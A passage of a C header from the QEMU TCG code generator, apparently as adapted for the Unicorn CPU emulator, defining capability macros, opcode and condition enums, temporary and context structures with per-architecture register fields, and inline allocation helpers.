TCG_TARGET_HAS_extract_i64 0 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_movcond_i64 0 #define TCG_TARGET_HAS_add2_i64 0 #define TCG_TARGET_HAS_sub2_i64 0 #define TCG_TARGET_HAS_mulu2_i64 0 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 0 #define TCG_TARGET_HAS_mulsh_i64 0 /* Turn some undef macros into true macros. */ #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #endif #ifndef TCG_TARGET_deposit_i32_valid #define TCG_TARGET_deposit_i32_valid(ofs, len) 1 #endif #ifndef TCG_TARGET_deposit_i64_valid #define TCG_TARGET_deposit_i64_valid(ofs, len) 1 #endif #ifndef TCG_TARGET_extract_i32_valid #define TCG_TARGET_extract_i32_valid(ofs, len) 1 #endif #ifndef TCG_TARGET_extract_i64_valid #define TCG_TARGET_extract_i64_valid(ofs, len) 1 #endif /* Only one of DIV or DIV2 should be defined. */ #if defined(TCG_TARGET_HAS_div_i32) #define TCG_TARGET_HAS_div2_i32 0 #elif defined(TCG_TARGET_HAS_div2_i32) #define TCG_TARGET_HAS_div_i32 0 #define TCG_TARGET_HAS_rem_i32 0 #endif #if defined(TCG_TARGET_HAS_div_i64) #define TCG_TARGET_HAS_div2_i64 0 #elif defined(TCG_TARGET_HAS_div2_i64) #define TCG_TARGET_HAS_div_i64 0 #define TCG_TARGET_HAS_rem_i64 0 #endif /* For 32-bit targets, some sort of unsigned widening multiply is required. */ #if TCG_TARGET_REG_BITS == 32 \ && !(defined(TCG_TARGET_HAS_mulu2_i32) \ || defined(TCG_TARGET_HAS_muluh_i32)) # error "Missing unsigned widening multiply" #endif #if !defined(TCG_TARGET_HAS_v64) \ && !defined(TCG_TARGET_HAS_v128) \ && !defined(TCG_TARGET_HAS_v256) #define TCG_TARGET_MAYBE_vec 0 #define TCG_TARGET_HAS_abs_vec 0 #define TCG_TARGET_HAS_neg_vec 0 #define TCG_TARGET_HAS_not_vec 0 #define TCG_TARGET_HAS_andc_vec 0 #define TCG_TARGET_HAS_orc_vec 0 #define TCG_TARGET_HAS_shi_vec 0 #define TCG_TARGET_HAS_shs_vec 0 #define TCG_TARGET_HAS_shv_vec 0 #define TCG_TARGET_HAS_mul_vec 0 #define TCG_TARGET_HAS_sat_vec 0 #define TCG_TARGET_HAS_minmax_vec 0 #define TCG_TARGET_HAS_bitsel_vec 0 #define TCG_TARGET_HAS_cmpsel_vec 0 #else #define TCG_TARGET_MAYBE_vec 1 #endif #ifndef TCG_TARGET_HAS_v64 #define TCG_TARGET_HAS_v64 0 #endif #ifndef TCG_TARGET_HAS_v128 #define TCG_TARGET_HAS_v128 0 #endif #ifndef TCG_TARGET_HAS_v256 #define TCG_TARGET_HAS_v256 0 #endif #ifndef TARGET_INSN_START_EXTRA_WORDS # define TARGET_INSN_START_WORDS 1 #else # define TARGET_INSN_START_WORDS (1 + TARGET_INSN_START_EXTRA_WORDS) #endif typedef enum TCGOpcode { #define DEF(name, oargs, iargs, cargs, flags) INDEX_op_ ## name, #include "tcg/tcg-opc.h" #undef DEF NB_OPS, } TCGOpcode; #define tcg_regset_set_reg(d, r) ((d) |= (TCGRegSet)1 << (r)) #define tcg_regset_reset_reg(d, r) ((d) &= ~((TCGRegSet)1 << (r))) #define tcg_regset_test_reg(d, r) (((d) >> (r)) & 1) #ifndef TCG_TARGET_INSN_UNIT_SIZE # error "Missing TCG_TARGET_INSN_UNIT_SIZE" #elif TCG_TARGET_INSN_UNIT_SIZE == 1 typedef uint8_t tcg_insn_unit; #elif TCG_TARGET_INSN_UNIT_SIZE == 2 typedef uint16_t tcg_insn_unit; #elif TCG_TARGET_INSN_UNIT_SIZE == 4 typedef uint32_t tcg_insn_unit; #elif TCG_TARGET_INSN_UNIT_SIZE == 8 typedef uint64_t tcg_insn_unit; #else /* The port better have done this. */ #endif #if defined CONFIG_DEBUG_TCG || defined QEMU_STATIC_ANALYSIS # define tcg_debug_assert(X) do { assert(X); } while (0) #else #ifndef _MSC_VER # define tcg_debug_assert(X) \ do { if (!(X)) { __builtin_unreachable(); } } while (0) #else # define tcg_debug_assert(X) #endif #endif typedef struct TCGRelocation TCGRelocation; struct TCGRelocation { QSIMPLEQ_ENTRY(TCGRelocation) next; tcg_insn_unit *ptr; intptr_t addend; int type; }; typedef struct TCGLabel TCGLabel; struct TCGLabel { unsigned present : 1; unsigned has_value : 1; unsigned id : 14; unsigned refs : 16; union { uintptr_t value; tcg_insn_unit *value_ptr; } u; QSIMPLEQ_HEAD(, TCGRelocation) relocs; QSIMPLEQ_ENTRY(TCGLabel) next; }; typedef struct TCGPool { struct TCGPool *next; int size; uint8_t QEMU_ALIGN(8, data[0]); } TCGPool; #define TCG_POOL_CHUNK_SIZE 32768 #define TCG_MAX_TEMPS 512 #define TCG_MAX_INSNS 512 /* when the size of the arguments of a called function is smaller than this value, they are statically allocated in the TB stack frame */ #define TCG_STATIC_CALL_ARGS_SIZE 128 typedef enum TCGType { TCG_TYPE_I32, TCG_TYPE_I64, TCG_TYPE_V64, TCG_TYPE_V128, TCG_TYPE_V256, TCG_TYPE_COUNT, /* number of different types */ /* An alias for the size of the host register. */ #if TCG_TARGET_REG_BITS == 32 TCG_TYPE_REG = TCG_TYPE_I32, #else TCG_TYPE_REG = TCG_TYPE_I64, #endif /* An alias for the size of the native pointer. */ #if UINTPTR_MAX == UINT32_MAX TCG_TYPE_PTR = TCG_TYPE_I32, #else TCG_TYPE_PTR = TCG_TYPE_I64, #endif /* An alias for the size of the target "long", aka register. */ #if TARGET_LONG_BITS == 64 TCG_TYPE_TL = TCG_TYPE_I64, #else TCG_TYPE_TL = TCG_TYPE_I32, #endif } TCGType; /** * get_alignment_bits * @memop: MemOp value * * Extract the alignment size from the memop. */ static inline unsigned get_alignment_bits(MemOp memop) { unsigned a = memop & MO_AMASK; if (a == MO_UNALN) { /* No alignment required. */ a = 0; } else if (a == MO_ALIGN) { /* A natural alignment requirement. */ a = memop & MO_SIZE; } else { /* A specific alignment requirement. */ a = a >> MO_ASHIFT; } /* The requested alignment cannot overlap the TLB flags. */ tcg_debug_assert((TLB_FLAGS_MASK & ((1 << a) - 1)) == 0); return a; } typedef tcg_target_ulong TCGArg; /* Define type and accessor macros for TCG variables. TCG variables are the inputs and outputs of TCG ops, as described in tcg/README. Target CPU front-end code uses these types to deal with TCG variables as it emits TCG code via the tcg_gen_* functions. They come in several flavours: * TCGv_i32 : 32 bit integer type * TCGv_i64 : 64 bit integer type * TCGv_ptr : a host pointer type * TCGv_vec : a host vector type; the exact size is not exposed to the CPU front-end code. * TCGv : an integer type the same size as target_ulong (an alias for either TCGv_i32 or TCGv_i64) The compiler's type checking will complain if you mix them up and pass the wrong sized TCGv to a function. Users of tcg_gen_* don't need to know about any of the internal details of these, and should treat them as opaque types. You won't be able to look inside them in a debugger either. Internal implementation details follow: Note that there is no definition of the structs TCGv_i32_d etc anywhere. This is deliberate, because the values we store in variables of type TCGv_i32 are not really pointers-to-structures. They're just small integers, but keeping them in pointer types like this means that the compiler will complain if you accidentally pass a TCGv_i32 to a function which takes a TCGv_i64, and so on. Only the internals of TCG need to care about the actual contents of the types. */ typedef struct TCGv_i32_d *TCGv_i32; typedef struct TCGv_i64_d *TCGv_i64; typedef struct TCGv_ptr_d *TCGv_ptr; typedef struct TCGv_vec_d *TCGv_vec; typedef TCGv_ptr TCGv_env; #if TARGET_LONG_BITS == 32 #define TCGv TCGv_i32 #elif TARGET_LONG_BITS == 64 #define TCGv TCGv_i64 #else #error Unhandled TARGET_LONG_BITS value #endif /* call flags */ /* Helper does not read globals (either directly or through an exception). It implies TCG_CALL_NO_WRITE_GLOBALS. */ #define TCG_CALL_NO_READ_GLOBALS 0x0001 /* Helper does not write globals */ #define TCG_CALL_NO_WRITE_GLOBALS 0x0002 /* Helper can be safely suppressed if the return value is not used. */ #define TCG_CALL_NO_SIDE_EFFECTS 0x0004 /* Helper is QEMU_NORETURN. */ #define TCG_CALL_NO_RETURN 0x0008 /* convenience version of most used call flags */ #define TCG_CALL_NO_RWG TCG_CALL_NO_READ_GLOBALS #define TCG_CALL_NO_WG TCG_CALL_NO_WRITE_GLOBALS #define TCG_CALL_NO_SE TCG_CALL_NO_SIDE_EFFECTS #define TCG_CALL_NO_RWG_SE (TCG_CALL_NO_RWG | TCG_CALL_NO_SE) #define TCG_CALL_NO_WG_SE (TCG_CALL_NO_WG | TCG_CALL_NO_SE) /* Used to align parameters. See the comment before tcgv_i32_temp. */ #define TCG_CALL_DUMMY_ARG ((TCGArg)0) /* Conditions. Note that these are laid out for easy manipulation by the functions below: bit 0 is used for inverting; bit 1 is signed, bit 2 is unsigned, bit 3 is used with bit 0 for swapping signed/unsigned. */ typedef enum { /* non-signed */ TCG_COND_NEVER = 0 | 0 | 0 | 0, TCG_COND_ALWAYS = 0 | 0 | 0 | 1, TCG_COND_EQ = 8 | 0 | 0 | 0, TCG_COND_NE = 8 | 0 | 0 | 1, /* signed */ TCG_COND_LT = 0 | 0 | 2 | 0, TCG_COND_GE = 0 | 0 | 2 | 1, TCG_COND_LE = 8 | 0 | 2 | 0, TCG_COND_GT = 8 | 0 | 2 | 1, /* unsigned */ TCG_COND_LTU = 0 | 4 | 0 | 0, TCG_COND_GEU = 0 | 4 | 0 | 1, TCG_COND_LEU = 8 | 4 | 0 | 0, TCG_COND_GTU = 8 | 4 | 0 | 1, } TCGCond; /* Invert the sense of the comparison. */ static inline TCGCond tcg_invert_cond(TCGCond c) { return (TCGCond)(c ^ 1); } /* Swap the operands in a comparison. */ static inline TCGCond tcg_swap_cond(TCGCond c) { return c & 6 ? (TCGCond)(c ^ 9) : c; } /* Create an "unsigned" version of a "signed" comparison. */ static inline TCGCond tcg_unsigned_cond(TCGCond c) { return c & 2 ? (TCGCond)(c ^ 6) : c; } /* Create a "signed" version of an "unsigned" comparison. */ static inline TCGCond tcg_signed_cond(TCGCond c) { return c & 4 ? (TCGCond)(c ^ 6) : c; } /* Must a comparison be considered unsigned? */ static inline bool is_unsigned_cond(TCGCond c) { return (c & 4) != 0; } /* Create a "high" version of a double-word comparison. This removes equality from a LTE or GTE comparison. */ static inline TCGCond tcg_high_cond(TCGCond c) { switch (c) { case TCG_COND_GE: case TCG_COND_LE: case TCG_COND_GEU: case TCG_COND_LEU: return (TCGCond)(c ^ 8); default: return c; } } typedef enum TCGTempVal { TEMP_VAL_DEAD, TEMP_VAL_REG, TEMP_VAL_MEM, TEMP_VAL_CONST, } TCGTempVal; typedef struct TCGTemp { TCGReg reg:8; TCGTempVal val_type:8; TCGType base_type:8; TCGType type:8; unsigned int fixed_reg:1; unsigned int indirect_reg:1; unsigned int indirect_base:1; unsigned int mem_coherent:1; unsigned int mem_allocated:1; /* If true, the temp is saved across both basic blocks and translation blocks. */ unsigned int temp_global:1; /* If true, the temp is saved across basic blocks but dead at the end of translation blocks. If false, the temp is dead at the end of basic blocks. */ unsigned int temp_local:1; unsigned int temp_allocated:1; tcg_target_long val; struct TCGTemp *mem_base; intptr_t mem_offset; const char *name; /* Pass-specific information that can be stored for a temporary. One word worth of integer data, and one pointer to data allocated separately. */ uintptr_t state; void *state_ptr; } TCGTemp; typedef struct TCGContext TCGContext; typedef struct TCGTempSet { unsigned long l[BITS_TO_LONGS(TCG_MAX_TEMPS)]; } TCGTempSet; /* While we limit helpers to 6 arguments, for 32-bit hosts, with padding, this imples a max of 6*2 (64-bit in) + 2 (64-bit out) = 14 operands. There are never more than 2 outputs, which means that we can store all dead + sync data within 16 bits. */ #define DEAD_ARG 4 #define SYNC_ARG 1 typedef uint16_t TCGLifeData; /* The layout here is designed to avoid a bitfield crossing of a 32-bit boundary, which would cause GCC to add extra padding. */ typedef struct TCGOp { #ifdef _MSC_VER uint32_t opc : 8; /* 8 */ #else TCGOpcode opc : 8; /* 8 */ #endif /* Parameters for this opcode. See below. */ unsigned param1 : 4; /* 12 */ unsigned param2 : 4; /* 16 */ /* Lifetime data of the operands. */ unsigned life : 16; /* 32 */ /* Next and previous opcodes. */ QTAILQ_ENTRY(TCGOp) link; /* Arguments for the opcode. */ TCGArg args[MAX_OPC_PARAM]; /* Register preferences for the output(s). */ TCGRegSet output_pref[2]; } TCGOp; #define TCGOP_CALLI(X) (X)->param1 #define TCGOP_CALLO(X) (X)->param2 #define TCGOP_VECL(X) (X)->param1 #define TCGOP_VECE(X) (X)->param2 /* Make sure operands fit in the bitfields above. */ QEMU_BUILD_BUG_ON(NB_OPS > (1 << 8)); typedef struct TCGProfile { int64_t cpu_exec_time; int64_t tb_count1; int64_t tb_count; int64_t op_count; /* total insn count */ int op_count_max; /* max insn per TB */ int temp_count_max; int64_t temp_count; int64_t del_op_count; int64_t code_in_len; int64_t code_out_len; int64_t search_out_len; int64_t interm_time; int64_t code_time; int64_t la_time; int64_t opt_time; int64_t restore_count; int64_t restore_time; int64_t table_op_count[NB_OPS]; } TCGProfile; /* * We divide code_gen_buffer into equally-sized "regions" that TCG threads * dynamically allocate from as demand dictates. Given appropriate region * sizing, this minimizes flushes even when some TCG threads generate a lot * more code than others. */ typedef struct TCGOpDef TCGOpDef; struct tcg_region_state { /* fields set at init time */ void *start; void *start_aligned; void *end; size_t n; size_t size; /* size of one region */ size_t stride; /* .size + guard size */ size_t current; /* current region index */ size_t agg_size_full; /* aggregate size of full regions */ }; struct TCGContext { uint8_t *pool_cur, *pool_end; TCGPool *pool_first, *pool_current, *pool_first_large; int nb_labels; int nb_globals; int nb_temps; int nb_indirects; int nb_ops; /* goto_tb support */ tcg_insn_unit *code_buf; uint16_t *tb_jmp_reset_offset; /* tb->jmp_reset_offset */ uintptr_t *tb_jmp_insn_offset; /* tb->jmp_target_arg if direct_jump */ uintptr_t *tb_jmp_target_addr; /* tb->jmp_target_arg if !direct_jump */ TCGRegSet reserved_regs; uint32_t tb_cflags; /* cflags of the current TB */ intptr_t current_frame_offset; intptr_t frame_start; intptr_t frame_end; TCGTemp *frame_temp; tcg_insn_unit *code_ptr; #ifdef CONFIG_DEBUG_TCG int temps_in_use; int goto_tb_issue_mask; const TCGOpcode *vecop_list; #endif /* Code generation. Note that we specifically do not use tcg_insn_unit here, because there's too much arithmetic throughout that relies on addition and subtraction working on bytes. Rely on the GCC extension that allows arithmetic on void*. */ void *code_gen_prologue; void *code_gen_epilogue; void *code_gen_buffer; void *initial_buffer; size_t initial_buffer_size; size_t code_gen_buffer_size; void *code_gen_ptr; void *data_gen_ptr; /* Threshold to flush the translated code buffer. */ void *code_gen_highwater; size_t tb_phys_invalidate_count; /* Track which vCPU triggers events */ CPUState *cpu; /* *_trans */ /* These structures are private to tcg-target.inc.c. */ #ifdef TCG_TARGET_NEED_LDST_LABELS QSIMPLEQ_HEAD(, TCGLabelQemuLdst) ldst_labels; #endif #ifdef TCG_TARGET_NEED_POOL_LABELS struct TCGLabelPoolData *pool_labels; #endif TCGLabel *exitreq_label; TCGTempSet free_temps[TCG_TYPE_COUNT * 2]; TCGTemp temps[TCG_MAX_TEMPS]; /* globals first, temps after */ QTAILQ_HEAD(, TCGOp) ops, free_ops; QSIMPLEQ_HEAD(, TCGLabel) labels; /* Tells which temporary holds a given register. It does not take into account fixed registers */ TCGTemp *reg_to_temp[TCG_TARGET_NB_REGS]; uint16_t gen_insn_end_off[TCG_MAX_INSNS]; target_ulong gen_insn_data[TCG_MAX_INSNS][TARGET_INSN_START_WORDS]; /* qemu/accel/tcg/translate-all.c */ TBContext tb_ctx; /* qemu/include/exec/gen-icount.h */ TCGOp *icount_start_insn; /* qemu/tcg/tcg.c */ GHashTable *helper_table; GHashTable *custom_helper_infos; // To support inline hooks. TCGv_ptr cpu_env; struct tcg_region_state region; GTree *tree; TCGRegSet tcg_target_available_regs[TCG_TYPE_COUNT]; TCGRegSet tcg_target_call_clobber_regs; int *indirect_reg_alloc_order; struct jit_code_entry *one_entry; /* qemu/tcg/tcg-common.c */ TCGOpDef *tcg_op_defs; // Unicorn engine variables struct uc_struct *uc; /* qemu/target/i386/translate.c: global register indexes */ TCGv cpu_cc_dst, cpu_cc_src, cpu_cc_src2; TCGv_i32 cpu_cc_op; TCGv cpu_regs[56]; // 16 GRP for x64 /* only x86 need cpu_seg_base[]. */ TCGv cpu_seg_base[6]; TCGv_i64 cpu_bndl[4]; TCGv_i64 cpu_bndu[4]; /* qemu/tcg/i386/tcg-target.inc.c */ void *tb_ret_addr; /* target/riscv/translate.c */ TCGv cpu_gpr[32], cpu_pc; // also target/mips/translate.c TCGv_i64 cpu_fpr[32]; /* assume F and D extensions */ TCGv load_res; TCGv load_val; // target/arm/translate.c /* We reuse the same 64-bit temporaries for efficiency. */ TCGv_i64 cpu_V0, cpu_V1, cpu_M0; TCGv_i32 cpu_R[16]; TCGv_i32 cpu_CF, cpu_NF, cpu_VF, cpu_ZF; TCGv_i64 cpu_exclusive_addr; TCGv_i64 cpu_exclusive_val; // target/arm/translate-a64.c TCGv_i64 cpu_X[32]; TCGv_i64 cpu_pc_arm64; /* Load/store exclusive handling */ TCGv_i64 cpu_exclusive_high; // target/mips/translate.c // #define MIPS_DSP_ACC 4 // TCGv cpu_HI[MIPS_DSP_ACC], cpu_LO[MIPS_DSP_ACC]; TCGv cpu_HI[4], cpu_LO[4]; TCGv cpu_dspctrl, btarget, bcond; TCGv cpu_lladdr, cpu_llval; TCGv_i32 hflags; TCGv_i32 fpu_fcr0, fpu_fcr31; TCGv_i64 fpu_f64[32]; TCGv_i64 msa_wr_d[64]; #if defined(TARGET_MIPS64) /* Upper halves of R5900's 128-bit registers: MMRs (multimedia registers) */ TCGv_i64 cpu_mmr[32]; #endif #if !defined(TARGET_MIPS64) /* MXU registers */ // #define NUMBER_OF_MXU_REGISTERS 16 // TCGv mxu_gpr[NUMBER_OF_MXU_REGISTERS - 1]; TCGv mxu_gpr[16 - 1]; TCGv mxu_CR; #endif // target/sparc/translate.c /* global register indexes */ TCGv_ptr cpu_regwptr; // TCGv cpu_cc_src, cpu_cc_src2, cpu_cc_dst; // TCGv_i32 cpu_cc_op; TCGv_i32 cpu_psr; TCGv cpu_fsr, cpu_npc; // TCGv cpu_regs[32]; TCGv cpu_y; TCGv cpu_tbr; TCGv cpu_cond; #ifdef TARGET_SPARC64 TCGv_i32 cpu_xcc, cpu_fprs; TCGv cpu_gsr; TCGv cpu_tick_cmpr, cpu_stick_cmpr, cpu_hstick_cmpr; TCGv cpu_hintp, cpu_htba, cpu_hver, cpu_ssr, cpu_ver; #else TCGv cpu_wim; #endif /* Floating point registers */ // TCGv_i64 cpu_fpr[TARGET_DPREGS]; // target/m68k/translate.c TCGv_i32 cpu_halted; TCGv_i32 cpu_exception_index; char cpu_reg_names[2 * 8 * 3 + 5 * 4]; TCGv cpu_dregs[8]; TCGv cpu_aregs[8]; TCGv_i64 cpu_macc[4]; TCGv NULL_QREG; /* Used to distinguish stores from bad addressing modes. */ TCGv store_dummy; // target/tricore/translate.c TCGv_i32 cpu_gpr_a[16]; TCGv_i32 cpu_gpr_d[16]; TCGv_i32 cpu_PSW_C, cpu_PSW_V, cpu_PSW_SV, cpu_PSW_AV, cpu_PSW_SAV; TCGv_i32 cpu_PC, cpu_PCXI, cpu_PSW, cpu_ICR; // Used to store the start of current instrution. uint64_t pc_start; // target/s390x/translate.c TCGv_i64 psw_addr; TCGv_i64 psw_mask; TCGv_i64 gbea; TCGv_i32 cc_op; TCGv_i64 cc_src; TCGv_i64 cc_dst; TCGv_i64 cc_vr; char s390x_cpu_reg_names[16][4]; // renamed from original cpu_reg_names[][] to avoid name clash with m68k TCGv_i64 regs[16]; }; static inline size_t temp_idx(TCGContext *tcg_ctx, TCGTemp *ts) { ptrdiff_t n = ts - tcg_ctx->temps; tcg_debug_assert(n >= 0 && n < tcg_ctx->nb_temps); return n; } static inline TCGArg temp_arg(TCGTemp *ts) { return (uintptr_t)ts; } static inline TCGTemp *arg_temp(TCGArg a) { return (TCGTemp *)(uintptr_t)a; } /* Using the offset of a temporary, relative to TCGContext, rather than its index means that we don't use 0. That leaves offset 0 free for a NULL representation without having to leave index 0 unused. */ static inline TCGTemp *tcgv_i32_temp(TCGContext *tcg_ctx, TCGv_i32 v) { uintptr_t o = (uintptr_t)v; TCGTemp *t = (TCGTemp *)((char *)tcg_ctx + o); tcg_debug_assert(offsetof(TCGContext, temps[temp_idx(tcg_ctx, t)]) == o); return t; } static inline TCGTemp *tcgv_i64_temp(TCGContext *tcg_ctx, TCGv_i64 v) { return tcgv_i32_temp(tcg_ctx, (TCGv_i32)v); } static inline TCGTemp *tcgv_ptr_temp(TCGContext *tcg_ctx, TCGv_ptr v) { return tcgv_i32_temp(tcg_ctx, (TCGv_i32)v); } static inline TCGTemp *tcgv_vec_temp(TCGContext *tcg_ctx, TCGv_vec v) { return tcgv_i32_temp(tcg_ctx, (TCGv_i32)v); } static inline TCGArg tcgv_i32_arg(TCGContext *tcg_ctx, TCGv_i32 v) { return temp_arg(tcgv_i32_temp(tcg_ctx, v)); } static inline TCGArg tcgv_i64_arg(TCGContext *tcg_ctx, TCGv_i64 v) { return temp_arg(tcgv_i64_temp(tcg_ctx, v)); } static inline TCGArg tcgv_ptr_arg(TCGContext *tcg_ctx, TCGv_ptr v) { return temp_arg(tcgv_ptr_temp(tcg_ctx, v)); } static inline TCGArg tcgv_vec_arg(TCGContext *tcg_ctx, TCGv_vec v) { return temp_arg(tcgv_vec_temp(tcg_ctx, v)); } static inline TCGv_i32 temp_tcgv_i32(TCGContext *tcg_ctx, TCGTemp *t) { (void)temp_idx(tcg_ctx, t); /* trigger embedded assert */ return (TCGv_i32)((char *)t - (char *)tcg_ctx); } static inline TCGv_i64 temp_tcgv_i64(TCGContext *tcg_ctx, TCGTemp *t) { return (TCGv_i64)temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_ptr temp_tcgv_ptr(TCGContext *tcg_ctx, TCGTemp *t) { return (TCGv_ptr)temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_vec temp_tcgv_vec(TCGContext *tcg_ctx, TCGTemp *t) { return (TCGv_vec)temp_tcgv_i32(tcg_ctx, t); } #if TCG_TARGET_REG_BITS == 32 static inline TCGv_i32 TCGV_LOW(TCGContext *tcg_ctx, TCGv_i64 t) { return temp_tcgv_i32(tcg_ctx, tcgv_i64_temp(tcg_ctx, t)); } static inline TCGv_i32 TCGV_HIGH(TCGContext *tcg_ctx, TCGv_i64 t) { return temp_tcgv_i32(tcg_ctx, tcgv_i64_temp(tcg_ctx, t) + 1); } #endif static inline void tcg_set_insn_param(TCGOp *op, int arg, TCGArg v) { op->args[arg] = v; } static inline void tcg_set_insn_start_param(TCGOp *op, int arg, target_ulong v) { #if TARGET_LONG_BITS <= TCG_TARGET_REG_BITS tcg_set_insn_param(op, arg, v); #else tcg_set_insn_param(op, arg * 2, v); tcg_set_insn_param(op, arg * 2 + 1, v >> 32); #endif } /* The last op that was emitted. */ static inline TCGOp *tcg_last_op(TCGContext *tcg_ctx) { return QTAILQ_LAST(&tcg_ctx->ops); } /* Test for whether to terminate the TB for using too many opcodes. */ static inline bool tcg_op_buf_full(TCGContext *tcg_ctx) { /* This is not a hard limit, it merely stops translation when * we have produced "enough" opcodes. We want to limit TB size * such that a RISC host can reasonably use a 16-bit signed * branch within the TB. We also need to be mindful of the * 16-bit unsigned offsets, TranslationBlock.jmp_reset_offset[] * and TCGContext.gen_insn_end_off[]. */ return tcg_ctx->nb_ops >= 4000; } /* pool based memory allocation */ /* user-mode: mmap_lock must be held for tcg_malloc_internal. */ void *tcg_malloc_internal(TCGContext *s, int size); void tcg_pool_reset(TCGContext *s); TranslationBlock *tcg_tb_alloc(TCGContext *s); void tcg_region_init(TCGContext *tcg_ctx); void tcg_region_reset_all(TCGContext *tcg_ctx); size_t tcg_code_size(TCGContext *tcg_ctx); size_t tcg_code_capacity(TCGContext *tcg_ctx); void tcg_tb_insert(TCGContext *tcg_ctx, TranslationBlock *tb); void tcg_tb_remove(TCGContext *tcg_ctx, TranslationBlock *tb); size_t tcg_tb_phys_invalidate_count(TCGContext *tcg_ctx); TranslationBlock *tcg_tb_lookup(TCGContext *tcg_ctx, uintptr_t tc_ptr); /* glib gtree: * gboolean (*GTraverseFunc) (gpointer key, gpointer value, gpointer data); */ typedef int (*GTraverseFunc) (void *key, void *value, void *data); void tcg_tb_foreach(TCGContext *tcg_ctx, GTraverseFunc func, gpointer user_data); size_t tcg_nb_tbs(TCGContext *tcg_ctx); /* user-mode: Called with mmap_lock held. */ static inline void *tcg_malloc(TCGContext *tcg_ctx, int size) { TCGContext *s = tcg_ctx; uint8_t *ptr, *ptr_end; /* ??? This is a weak placeholder for minimum malloc alignment. */ size = QEMU_ALIGN_UP(size, 8); ptr = s->pool_cur; ptr_end = ptr + size; if (unlikely(ptr_end > s->pool_end)) { return tcg_malloc_internal(tcg_ctx, size); } else { s->pool_cur = ptr_end; return ptr; } } void tcg_context_init(TCGContext *s); void tcg_register_thread(void); void tcg_prologue_init(TCGContext *s); void tcg_func_start(TCGContext *s); int tcg_gen_code(TCGContext *s, TranslationBlock *tb); void tcg_set_frame(TCGContext *s, TCGReg reg, intptr_t start, intptr_t size); TCGTemp *tcg_global_mem_new_internal(TCGContext *tcg_ctx, TCGType, TCGv_ptr, intptr_t, const char *); TCGTemp *tcg_temp_new_internal(TCGContext *tcg_ctx, TCGType, bool); void tcg_temp_free_internal(TCGContext *tcg_ctx, TCGTemp *); TCGv_vec tcg_temp_new_vec(TCGContext *tcg_ctx, TCGType type); TCGv_vec tcg_temp_new_vec_matching(TCGContext *tcg_ctx, TCGv_vec match); static inline void tcg_temp_free_i32(TCGContext *tcg_ctx, TCGv_i32 arg) { tcg_temp_free_internal(tcg_ctx, tcgv_i32_temp(tcg_ctx, arg)); } static inline void tcg_temp_free_i64(TCGContext *tcg_ctx, TCGv_i64 arg) { tcg_temp_free_internal(tcg_ctx, tcgv_i64_temp(tcg_ctx, arg)); } static inline void tcg_temp_free_ptr(TCGContext *tcg_ctx, TCGv_ptr arg) { tcg_temp_free_internal(tcg_ctx, tcgv_ptr_temp(tcg_ctx, arg)); } static inline void tcg_temp_free_vec(TCGContext *tcg_ctx, TCGv_vec arg) { tcg_temp_free_internal(tcg_ctx, tcgv_vec_temp(tcg_ctx, arg)); } static inline TCGv_i32 tcg_global_mem_new_i32(TCGContext *tcg_ctx, TCGv_ptr reg, intptr_t offset, const char *name) { TCGTemp *t = tcg_global_mem_new_internal(tcg_ctx, TCG_TYPE_I32, reg, offset, name); return temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_i32 tcg_temp_new_i32(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_I32, false); return temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_i32 tcg_temp_local_new_i32(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_I32, true); return temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_i64 tcg_global_mem_new_i64(TCGContext *tcg_ctx, TCGv_ptr reg, intptr_t offset, const char *name) { TCGTemp *t = tcg_global_mem_new_internal(tcg_ctx, TCG_TYPE_I64, reg, offset, name); return temp_tcgv_i64(tcg_ctx, t); } static inline TCGv_i64 tcg_temp_new_i64(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_I64, false); return temp_tcgv_i64(tcg_ctx, t); } static inline TCGv_i64 tcg_temp_local_new_i64(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_I64, true); return temp_tcgv_i64(tcg_ctx, t); } static inline TCGv_ptr tcg_global_mem_new_ptr(TCGContext *tcg_ctx, TCGv_ptr reg, intptr_t offset, const char *name) { TCGTemp *t = tcg_global_mem_new_internal(tcg_ctx, TCG_TYPE_PTR, reg, offset, name); return temp_tcgv_ptr(tcg_ctx, t); } static inline TCGv_ptr tcg_temp_new_ptr(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_PTR, false); return temp_tcgv_ptr(tcg_ctx, t); } static inline TCGv_ptr tcg_temp_local_new_ptr(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_PTR, true); return temp_tcgv_ptr(tcg_ctx, t); } #if defined(CONFIG_DEBUG_TCG) /* If you call tcg_clear_temp_count() at the start of a section of * code which is not supposed to leak any TCG temporaries, then * calling tcg_check_temp_count() at the end of the section will * return 1 if the section did in fact leak a temporary. */ void tcg_clear_temp_count(void); int tcg_check_temp_count(void); #else #define tcg_clear_temp_count() do { } while (0) #define tcg_check_temp_count() 0 #endif int64_t tcg_cpu_exec_time(void); #define TCG_CT_ALIAS 0x80 #define TCG_CT_IALIAS 0x40 #define TCG_CT_NEWREG 0x20 /* output requires a new register */ #define TCG_CT_REG 0x01 #define TCG_CT_CONST 0x02 /* any constant of register size */ typedef struct TCGArgConstraint { uint16_t ct; uint8_t alias_index; union { TCGRegSet regs; } u; } TCGArgConstraint; #define TCG_MAX_OP_ARGS 16 /* Bits for TCGOpDef->flags, 8 bits available. */ enum { /* Instruction exits the translation block. */ TCG_OPF_BB_EXIT = 0x01, /* Instruction defines the end of a basic block. */ TCG_OPF_BB_END = 0x02, /* Instruction clobbers call registers and potentially update globals. */ TCG_OPF_CALL_CLOBBER = 0x04, /* Instruction has side effects: it cannot be removed if its outputs are not used, and might trigger exceptions. */ TCG_OPF_SIDE_EFFECTS = 0x08, /* Instruction operands are 64-bits (otherwise 32-bits). */ 